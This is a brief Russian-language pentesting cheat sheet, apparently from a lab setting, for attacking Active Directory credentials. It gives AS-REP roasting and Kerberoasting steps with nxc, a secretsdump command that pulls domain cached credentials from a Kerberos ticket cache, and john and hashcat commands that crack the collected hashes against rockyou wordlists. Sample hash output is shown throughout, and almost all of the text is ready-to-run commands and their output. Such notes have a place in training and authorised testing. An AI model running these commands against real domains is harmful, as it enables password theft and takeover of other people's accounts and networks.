Asreproasting
собираем хэши все в один файл asreproast.txt
$krb5asrep$23$PUPKIN@domain.LOCAL:986b6b18122c49016189777680dec662$d70486ed9fcad29ddf9152b6afea0e6f122c3301ae5c8f8a......
$krb5asrep$23$SIDOROV@domain.LOCAL:557314c1fd9e33ba6f0087d767d0559d$012ec2151bacfc0197e045c9f4591.....
.....

john --format=krb5asrep --wordlist=/home/user/Desktop/rockyou2024_printable_8-40.txt asreproast.txt
ждем


Kerberoasting 
nxc ldap dc01.domain.local -u 'user' -p  'password' --kerberoasting kerberoast.txt
собираем хэши все в один файл kerberoast.txt

$krb5tgs$23$*srv$domain.LOCAL$domain.local/tgs_srv*$73ce6a13722cc5501d4506e7c3
$krb5tgs$23$*srv1$domain.LOCAL$domain.local/tgs_srv*$73ce6a13722cc5501d4506e7c3
....
john --format=krb5tgs --wordlist=/home/user/Desktop/rockyou2024_printable_8-40.txt kerberoast.txt
ждем
также после сканирования результаты можно посмотреть cat ~/.john/john.pot




#брут mscache 
без пароля можно сдампить, если есть Administator.ccache
impacket-secretsdump -debug -no-pass -k pwrgrid.mgmt/Administrator@DC01.pwrgrid.mgmt  

вывод 
PCN.CTRL/fsp_bkp:$DCC2$10240#fsp_bkp#c05bf437de8b9c25930a1e2ec7818a2f: 
сохраняем в файл mscache.txt

данный формат через hashcat несбрутить, нужно преобразовать файл
echo ; cat mscache.txt ; echo ; cut -d ":" -f 2 mscache.txt 
вывод: $DCC2$10240#fsp_bkp#c05bf437de8b9c25930a1e2ec7818a2f
┌──(kali㉿kali)-
└─$ hashcat -m 2100 '$DCC2$10240#fsp_bkp#c05bf437de8b9c25930a1e2ec7818a2f' /usr/share/wordlists/rockyou.txt --force --potfile-disable
